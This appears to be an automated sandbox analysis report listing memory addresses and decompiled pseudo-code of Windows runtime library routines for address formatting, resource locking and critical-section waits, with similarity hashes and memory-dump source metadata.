                                                                                                                                                    0x02082363
                                                                                                                                                    0x02082369
                                                                                                                                                    0x0208236a
                                                                                                                                                    0x0208236c
                                                                                                                                                    0x02082371
                                                                                                                                                    0x02082373
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02082379
                                                                                                                                                    0x02082379
                                                                                                                                                    0x0208237a
                                                                                                                                                    0x0208237f
                                                                                                                                                    0x0208237f
                                                                                                                                                    0x02082385
                                                                                                                                                    0x02082386
                                                                                                                                                    0x02082389
                                                                                                                                                    0x0208238e
                                                                                                                                                    0x02082390
                                                                                                                                                    0x02045378
                                                                                                                                                    0x0204537c
                                                                                                                                                    0x02082396
                                                                                                                                                    0x02082396
                                                                                                                                                    0x02082397
                                                                                                                                                    0x0208239c
                                                                                                                                                    0x020823a2
                                                                                                                                                    0x020823a3
                                                                                                                                                    0x020823a6
                                                                                                                                                    0x020823ab
                                                                                                                                                    0x020823ad
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020823b3
                                                                                                                                                    0x020823b3
                                                                                                                                                    0x020823b4
                                                                                                                                                    0x020823b9
                                                                                                                                                    0x020823ba
                                                                                                                                                    0x020823ba
                                                                                                                                                    0x020823bc
                                                                                                                                                    0x020823bf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02079153
                                                                                                                                                    0x02079158
                                                                                                                                                    0x0207915a
                                                                                                                                                    0x0207915e
                                                                                                                                                    0x02079160
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02079166
                                                                                                                                                    0x02079166
                                                                                                                                                    0x02079171
                                                                                                                                                    0x02079176
                                                                                                                                                    0x02079176
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02079160
                                                                                                                                                    0x020823c6
                                                                                                                                                    0x020823ce
                                                                                                                                                    0x020823d7
                                                                                                                                                    0x020823d7
                                                                                                                                                    0x020823ad
                                                                                                                                                    0x02082390
                                                                                                                                                    0x02082373
                                                                                                                                                    0x0208233f
                                                                                                                                                    0x0208233f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208233f
                                                                                                                                                    0x02082291
                                                                                                                                                    0x02082291
                                                                                                                                                    0x02082293
                                                                                                                                                    0x02082295
                                                                                                                                                    0x0208229a
                                                                                                                                                    0x020822a1
                                                                                                                                                    0x020822a3
                                                                                                                                                    0x020822a7
                                                                                                                                                    0x020822a9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020822ab
                                                                                                                                                    0x020822ad
                                                                                                                                                    0x020822af
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020822af
                                                                                                                                                    0x020822b1
                                                                                                                                                    0x020822b4
                                                                                                                                                    0x020822b4
                                                                                                                                                    0x020822b6
                                                                                                                                                    0x020453be
                                                                                                                                                    0x020453be
                                                                                                                                                    0x020453be
                                                                                                                                                    0x020453c0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020453cb
                                                                                                                                                    0x020453ce
                                                                                                                                                    0x020453d0
                                                                                                                                                    0x020453d4
                                                                                                                                                    0x020453d6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020453d8
                                                                                                                                                    0x020453e3
                                                                                                                                                    0x020453ea
                                                                                                                                                    0x020453ea
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020453d6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020822b6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208228f
                                                                                                                                                    0x02082349
                                                                                                                                                    0x0208234d
                                                                                                                                                    0x02082251

                                                                                                                                                    APIs
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02082206
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                    • API String ID: 885266447-4236105082
                                                                                                                                                    • Opcode ID: b8a68985525e3e637d3f6474480a5cb03779208ecbcc944daeeb76650dd8a17b
                                                                                                                                                    • Instruction ID: 2a0601e39646d3b9256b4a692860b0c56b436c9e9d99be995b1f4844cd9923b0
                                                                                                                                                    • Opcode Fuzzy Hash: b8a68985525e3e637d3f6474480a5cb03779208ecbcc944daeeb76650dd8a17b
                                                                                                                                                    • Instruction Fuzzy Hash: 2A5137717403556FEB15DA18CCC1FA733EAAB98720F218269EC85DF284DA71EC41AB94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                    			E020614C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				char _v10;
                                                                                                                                                    				char _v140;
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				signed int _t24;
                                                                                                                                                    				void* _t26;
                                                                                                                                                    				signed int _t29;
                                                                                                                                                    				signed int _t34;
                                                                                                                                                    				signed int _t40;
                                                                                                                                                    				intOrPtr _t45;
                                                                                                                                                    				void* _t51;
                                                                                                                                                    				intOrPtr* _t52;
                                                                                                                                                    				void* _t54;
                                                                                                                                                    				signed int _t57;
                                                                                                                                                    				void* _t58;
                                                                                                                                                    
                                                                                                                                                    				_t51 = __edx;
                                                                                                                                                    				_t24 =  *0x2102088; // 0x764d65b9
                                                                                                                                                    				_v8 = _t24 ^ _t57;
                                                                                                                                                    				_t45 = _a16;
                                                                                                                                                    				_t53 = _a4;
                                                                                                                                                    				_t52 = _a20;
                                                                                                                                                    				if(_a4 == 0 || _t52 == 0) {
                                                                                                                                                    					L10:
                                                                                                                                                    					_t26 = 0xc000000d;
                                                                                                                                                    				} else {
                                                                                                                                                    					if(_t45 == 0) {
                                                                                                                                                    						if( *_t52 == _t45) {
                                                                                                                                                    							goto L3;
                                                                                                                                                    						} else {
                                                                                                                                                    							goto L10;
                                                                                                                                                    						}
                                                                                                                                                    					} else {
                                                                                                                                                    						L3:
                                                                                                                                                    						_t28 =  &_v140;
                                                                                                                                                    						if(_a12 != 0) {
                                                                                                                                                    							_push("[");
                                                                                                                                                    							_push(0x41);
                                                                                                                                                    							_push( &_v140);
                                                                                                                                                    							_t29 = E02057707();
                                                                                                                                                    							_t58 = _t58 + 0xc;
                                                                                                                                                    							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                                                                                                    						}
                                                                                                                                                    						_t54 = E020613CB(_t53, _t28);
                                                                                                                                                    						if(_a8 != 0) {
                                                                                                                                                    							_t34 = E02057707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                                                                                                    							_t58 = _t58 + 0x10;
                                                                                                                                                    							_t54 = _t54 + _t34 * 2;
                                                                                                                                                    						}
                                                                                                                                                    						if(_a12 != 0) {
                                                                                                                                                    							_t40 = E02057707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                                                                                                    							_t58 = _t58 + 0x10;
                                                                                                                                                    							_t54 = _t54 + _t40 * 2;
                                                                                                                                                    						}
                                                                                                                                                    						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                                                                                                    						 *_t52 = _t53;
                                                                                                                                                    						if( *_t52 < _t53) {
                                                                                                                                                    							goto L10;
                                                                                                                                                    						} else {
                                                                                                                                                    							E02022340(_t45,  &_v140, _t53 + _t53);
                                                                                                                                                    							_t26 = 0;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				return E0202E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                                                                                                    			}





















                                                                                                                                                    APIs
                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 0208EA22
                                                                                                                                                      • Part of subcall function 020613CB: ___swprintf_l.LIBCMT ref: 0206146B
                                                                                                                                                      • Part of subcall function 020613CB: ___swprintf_l.LIBCMT ref: 02061490
                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 0206156D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                    • String ID: %%%u$]:%u
                                                                                                                                                    • API String ID: 48624451-3050659472
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 45%
                                                                                                                                                    			E020453A5(signed int _a4, char _a8) {
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				signed int _t32;
                                                                                                                                                    				signed int _t37;
                                                                                                                                                    				signed int _t40;
                                                                                                                                                    				signed int _t42;
                                                                                                                                                    				void* _t45;
                                                                                                                                                    				intOrPtr _t46;
                                                                                                                                                    				void* _t48;
                                                                                                                                                    				signed int _t49;
                                                                                                                                                    				void* _t51;
                                                                                                                                                    				signed int _t57;
                                                                                                                                                    				signed int _t64;
                                                                                                                                                    				signed int _t71;
                                                                                                                                                    				void* _t74;
                                                                                                                                                    				intOrPtr _t78;
                                                                                                                                                    				signed int* _t79;
                                                                                                                                                    				void* _t85;
                                                                                                                                                    				signed int _t86;
                                                                                                                                                    				signed int _t92;
                                                                                                                                                    				void* _t104;
                                                                                                                                                    				void* _t105;
                                                                                                                                                    
                                                                                                                                                    				_t64 = _a4;
                                                                                                                                                    				_t32 =  *(_t64 + 0x28);
                                                                                                                                                    				_t71 = _t64 + 0x28;
                                                                                                                                                    				_push(_t92);
                                                                                                                                                    				if(_t32 < 0) {
                                                                                                                                                    					_t78 =  *[fs:0x18];
                                                                                                                                                    					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                                                                                                    					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                                                                                                    						goto L3;
                                                                                                                                                    					} else {
                                                                                                                                                    						__eflags = _t32 | 0xffffffff;
                                                                                                                                                    						asm("lock xadd [ecx], eax");
                                                                                                                                                    						return 1;
                                                                                                                                                    					}
                                                                                                                                                    				} else {
                                                                                                                                                    					L3:
                                                                                                                                                    					_push(_t86);
                                                                                                                                                    					while(1) {
                                                                                                                                                    						L4:
                                                                                                                                                    						__eflags = _t32;
                                                                                                                                                    						if(_t32 == 0) {
                                                                                                                                                    							break;
                                                                                                                                                    						}
                                                                                                                                                    						__eflags = _a8;
                                                                                                                                                    						if(_a8 == 0) {
                                                                                                                                                    							__eflags = 0;
                                                                                                                                                    							return 0;
                                                                                                                                                    						} else {
                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                                                                                                    							_t79 = _t64 + 0x24;
                                                                                                                                                    							_t71 = 1;
                                                                                                                                                    							asm("lock xadd [eax], ecx");
                                                                                                                                                    							_t32 =  *(_t64 + 0x28);
                                                                                                                                                    							_a4 = _t32;
                                                                                                                                                    							__eflags = _t32;
                                                                                                                                                    							if(_t32 != 0) {
                                                                                                                                                    								L19:
                                                                                                                                                    								_t86 = 0;
                                                                                                                                                    								__eflags = 0;
                                                                                                                                                    								while(1) {
                                                                                                                                                    									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                                                                                                    									asm("sbb esi, esi");
                                                                                                                                                    									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x021001c0;
                                                                                                                                                    									_push(_t92);
                                                                                                                                                    									_push(0);
                                                                                                                                                    									_t37 = E0201F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                                                                                                    									__eflags = _t37 - 0x102;
                                                                                                                                                    									if(_t37 != 0x102) {
                                                                                                                                                    										break;
                                                                                                                                                    									}
                                                                                                                                                    									_t71 =  *(_t92 + 4);
                                                                                                                                                    									_t85 =  *_t92;
                                                                                                                                                    									_t51 = E02064FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                                                                                                    									_push(_t85);
                                                                                                                                                    									_push(_t51);
                                                                                                                                                    									E02073F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                                                                                                    									E02073F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                                                                                                    									_t86 = _t86 + 1;
                                                                                                                                                    									_t105 = _t104 + 0x28;
                                                                                                                                                    									__eflags = _t86 - 2;
                                                                                                                                                    									if(__eflags > 0) {
                                                                                                                                                    										E020A217A(_t71, __eflags, _t64);
                                                                                                                                                    									}
                                                                                                                                                    									_push("RTL: Re-Waiting\n");
                                                                                                                                                    									_push(0);
                                                                                                                                                    									_push(0x65);
                                                                                                                                                    									E02073F92();
                                                                                                                                                    									_t104 = _t105 + 0xc;
                                                                                                                                                    								}
                                                                                                                                                    								__eflags = _t37;
                                                                                                                                                    								if(__eflags < 0) {
                                                                                                                                                    									_push(_t37);
                                                                                                                                                    									E02063915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                                                                                                    									asm("int3");
                                                                                                                                                    									_t40 =  *_t71;
                                                                                                                                                    									 *_t71 = 0;
                                                                                                                                                    									__eflags = _t40;
                                                                                                                                                    									if(_t40 == 0) {
                                                                                                                                                    										L1:
                                                                                                                                                    										_t42 = E02045384(_t92 + 0x24);
                                                                                                                                                    										if(_t42 != 0) {
                                                                                                                                                    											goto L31;
                                                                                                                                                    										} else {
                                                                                                                                                    											goto L2;
                                                                                                                                                    										}
                                                                                                                                                    									} else {
                                                                                                                                                    										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                                                                                                    										_push( &_a4);
                                                                                                                                                    										_push(_t40);
                                                                                                                                                    										_t49 = E0201F970( *((intOrPtr*)(_t92 + 0x18)));
                                                                                                                                                    										__eflags = _t49;
                                                                                                                                                    										if(__eflags >= 0) {
                                                                                                                                                    											goto L1;
                                                                                                                                                    										} else {
                                                                                                                                                    											_push(_t49);
                                                                                                                                                    											E02063915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                                                                                                    											L31:
                                                                                                                                                    											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                    											_push( &_a4);
                                                                                                                                                    											_push(1);
                                                                                                                                                    											_t42 = E0201F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                    											__eflags = _t42;
                                                                                                                                                    											if(__eflags >= 0) {
                                                                                                                                                    												L2:
                                                                                                                                                    												return _t42;
                                                                                                                                                    											} else {
                                                                                                                                                    												_push(_t42);
                                                                                                                                                    												E02063915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                                                                                                    												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                    												_push( &_a4);
                                                                                                                                                    												_push(1);
                                                                                                                                                    												_t42 = E0201F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                    												__eflags = _t42;
                                                                                                                                                    												if(__eflags >= 0) {
                                                                                                                                                    													goto L2;
                                                                                                                                                    												} else {
                                                                                                                                                    													_push(_t42);
                                                                                                                                                    													_t45 = E02063915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                                                                                                    													asm("int3");
                                                                                                                                                    													while(1) {
                                                                                                                                                    														_t74 = _t45;
                                                                                                                                                    														__eflags = _t45 - 1;
                                                                                                                                                    														if(_t45 != 1) {
                                                                                                                                                    															break;
                                                                                                                                                    														}
                                                                                                                                                    														_t86 = _t86 | 0xffffffff;
                                                                                                                                                    														_t45 = _t74;
                                                                                                                                                    														asm("lock cmpxchg [ebx], edi");
                                                                                                                                                    														__eflags = _t45 - _t74;
                                                                                                                                                    														if(_t45 != _t74) {
                                                                                                                                                    															continue;
                                                                                                                                                    														} else {
                                                                                                                                                    															_t46 =  *[fs:0x18];
                                                                                                                                                    															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                                                                                                    															return _t46;
                                                                                                                                                    														}
                                                                                                                                                    														goto L38;
                                                                                                                                                    													}
                                                                                                                                                    													E02045329(_t74, _t92);
                                                                                                                                                    													_push(1);
                                                                                                                                                    													_t48 = E020453A5(_t92);
                                                                                                                                                    													return _t48;
                                                                                                                                                    												}
                                                                                                                                                    											}
                                                                                                                                                    										}
                                                                                                                                                    									}
                                                                                                                                                    								} else {
                                                                                                                                                    									_t32 =  *(_t64 + 0x28);
                                                                                                                                                    									continue;
                                                                                                                                                    								}
                                                                                                                                                    							} else {
                                                                                                                                                    								_t71 =  *_t79;
                                                                                                                                                    								__eflags = _t71;
                                                                                                                                                    								if(__eflags > 0) {
                                                                                                                                                    									while(1) {
                                                                                                                                                    										_t57 = _t71;
                                                                                                                                                    										asm("lock cmpxchg [edi], esi");
                                                                                                                                                    										__eflags = _t57 - _t71;
                                                                                                                                                    										if(_t57 == _t71) {
                                                                                                                                                    											break;
                                                                                                                                                    										}
                                                                                                                                                    										_t71 = _t57;
                                                                                                                                                    										__eflags = _t57;
                                                                                                                                                    										if(_t57 > 0) {
                                                                                                                                                    											continue;
                                                                                                                                                    										}
                                                                                                                                                    										break;
                                                                                                                                                    									}
                                                                                                                                                    									_t32 = _a4;
                                                                                                                                                    									__eflags = _t71;
                                                                                                                                                    								}
                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                    									continue;
                                                                                                                                                    								} else {
                                                                                                                                                    									goto L19;
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						goto L38;
                                                                                                                                                    					}
                                                                                                                                                    					_t71 = _t71 | 0xffffffff;
                                                                                                                                                    					_t32 = 0;
                                                                                                                                                    					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                    					__eflags = 0;
                                                                                                                                                    					if(0 != 0) {
                                                                                                                                                    						goto L4;
                                                                                                                                                    					} else {
                                                                                                                                                    						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                    						return 1;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				L38:
                                                                                                                                                    			}
                                                                                                                                                    0x020822ad
                                                                                                                                                    0x020822af
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020822af
                                                                                                                                                    0x020822b1
                                                                                                                                                    0x020822b4
                                                                                                                                                    0x020822b4
                                                                                                                                                    0x020822b6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020822b6
                                                                                                                                                    0x0208228f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208226d
                                                                                                                                                    0x020453cb
                                                                                                                                                    0x020453ce
                                                                                                                                                    0x020453d0
                                                                                                                                                    0x020453d4
                                                                                                                                                    0x020453d6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020453d8
                                                                                                                                                    0x020453e3
                                                                                                                                                    0x020453ea
                                                                                                                                                    0x020453ea
                                                                                                                                                    0x020453d6
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 020822F4
                                                                                                                                                    Strings
                                                                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 020822FC
                                                                                                                                                    • RTL: Resource at %p, xrefs: 0208230B
                                                                                                                                                    • RTL: Re-Waiting, xrefs: 02082328
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                    • API String ID: 885266447-871070163
                                                                                                                                                    • Opcode ID: 481190edd16a55b445212cb73dba0f162756dc7d67e167e97031d68ca709f229
                                                                                                                                                    • Instruction ID: dfbec01e3a8eb74ee73d1080983723b68f3603b56d00869ca305239393adb59f
                                                                                                                                                    • Opcode Fuzzy Hash: 481190edd16a55b445212cb73dba0f162756dc7d67e167e97031d68ca709f229
                                                                                                                                                    • Instruction Fuzzy Hash: D751D5B16007066BEB11AB24CCC4FE777D9AF58725F114269ED49DB280EB61E841ABA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 51%
                                                                                                                                                    			E0204EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                    				signed int _v24;
                                                                                                                                                    				intOrPtr* _v28;
                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                    				signed int _v36;
                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                    				short _v66;
                                                                                                                                                    				char _v72;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                    				signed int _t40;
                                                                                                                                                    				intOrPtr _t42;
                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                    				signed int _t44;
                                                                                                                                                    				void* _t46;
                                                                                                                                                    				intOrPtr _t48;
                                                                                                                                                    				signed int _t49;
                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                    				intOrPtr _t53;
                                                                                                                                                    				signed char _t67;
                                                                                                                                                    				void* _t72;
                                                                                                                                                    				intOrPtr _t77;
                                                                                                                                                    				intOrPtr* _t80;
                                                                                                                                                    				intOrPtr _t84;
                                                                                                                                                    				intOrPtr* _t85;
                                                                                                                                                    				void* _t91;
                                                                                                                                                    				void* _t92;
                                                                                                                                                    				void* _t93;
                                                                                                                                                    
                                                                                                                                                    				_t80 = __edi;
                                                                                                                                                    				_t75 = __edx;
                                                                                                                                                    				_t70 = __ecx;
                                                                                                                                                    				_t84 = _a4;
                                                                                                                                                    				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                                                                                                                    					E0203DA92(__ecx, __edx, __eflags, _t84);
                                                                                                                                                    					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                                                                                                                    				}
                                                                                                                                                    				_push(0);
                                                                                                                                                    				__eflags = _t38 - 0xffffffff;
                                                                                                                                                    				if(_t38 == 0xffffffff) {
                                                                                                                                                    					_t39 =  *0x210793c; // 0x0
                                                                                                                                                    					_push(0);
                                                                                                                                                    					_push(_t84);
                                                                                                                                                    					_t40 = E020216C0(_t39);
                                                                                                                                                    				} else {
                                                                                                                                                    					_t40 = E0201F9D4(_t38);
                                                                                                                                                    				}
                                                                                                                                                    				_pop(_t85);
                                                                                                                                                    				__eflags = _t40;
                                                                                                                                                    				if(__eflags < 0) {
                                                                                                                                                    					_push(_t40);
                                                                                                                                                    					E02063915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                                                                                                                    					asm("int3");
                                                                                                                                                    					while(1) {
                                                                                                                                                    						L21:
                                                                                                                                                    						_t76 =  *[fs:0x18];
                                                                                                                                                    						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                    						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                                                                                                                    						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                                                                                                                    							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                                                                                                                    							_v66 = 0x1722;
                                                                                                                                                    							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                    							_t76 =  &_v72;
                                                                                                                                                    							_push( &_v72);
                                                                                                                                                    							_v28 = _t85;
                                                                                                                                                    							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                                                                                                                    							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                    							_push(0x10);
                                                                                                                                                    							_push(0x20402);
                                                                                                                                                    							E020201A4( *0x7ffe0382 & 0x000000ff);
                                                                                                                                                    						}
                                                                                                                                                    						while(1) {
                                                                                                                                                    							_t43 = _v8;
                                                                                                                                                    							_push(_t80);
                                                                                                                                                    							_push(0);
                                                                                                                                                    							__eflags = _t43 - 0xffffffff;
                                                                                                                                                    							if(_t43 == 0xffffffff) {
                                                                                                                                                    								_t71 =  *0x210793c; // 0x0
                                                                                                                                                    								_push(_t85);
                                                                                                                                                    								_t44 = E02021F28(_t71);
                                                                                                                                                    							} else {
                                                                                                                                                    								_t44 = E0201F8CC(_t43);
                                                                                                                                                    							}
                                                                                                                                                    							__eflags = _t44 - 0x102;
                                                                                                                                                    							if(_t44 != 0x102) {
                                                                                                                                                    								__eflags = _t44;
                                                                                                                                                    								if(__eflags < 0) {
                                                                                                                                                    									_push(_t44);
                                                                                                                                                    									E02063915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                                                                                                                    									asm("int3");
                                                                                                                                                    									E020A2306(_t85);
                                                                                                                                                    									__eflags = _t67 & 0x00000002;
                                                                                                                                                    									if((_t67 & 0x00000002) != 0) {
                                                                                                                                                    										_t7 = _t67 + 2; // 0x4
                                                                                                                                                    										_t72 = _t7;
                                                                                                                                                    										asm("lock cmpxchg [edi], ecx");
                                                                                                                                                    										__eflags = _t67 - _t67;
                                                                                                                                                    										if(_t67 == _t67) {
                                                                                                                                                    											E0204EC56(_t72, _t76, _t80, _t85);
                                                                                                                                                    										}
                                                                                                                                                    									}
                                                                                                                                                    									return 0;
                                                                                                                                                    								} else {
                                                                                                                                                    									__eflags = _v24;
                                                                                                                                                    									if(_v24 != 0) {
                                                                                                                                                    										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                                                                                                                    									}
                                                                                                                                                    									return 2;
                                                                                                                                                    								}
                                                                                                                                                    								goto L36;
                                                                                                                                                    							}
                                                                                                                                                    							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                                                                                                                    							_push(_t67);
                                                                                                                                                    							_t46 = E02064FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                                                                                                                    							_push(_t77);
                                                                                                                                                    							E02073F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                                                                                                                    							_t48 =  *_t85;
                                                                                                                                                    							_t92 = _t91 + 0x18;
                                                                                                                                                    							__eflags = _t48 - 0xffffffff;
                                                                                                                                                    							if(_t48 == 0xffffffff) {
                                                                                                                                                    								_t49 = 0;
                                                                                                                                                    								__eflags = 0;
                                                                                                                                                    							} else {
                                                                                                                                                    								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                                                                                                                    							}
                                                                                                                                                    							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                    							_push(_t49);
                                                                                                                                                    							_t50 = _v12;
                                                                                                                                                    							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                                                                                                                    							_push(_t85);
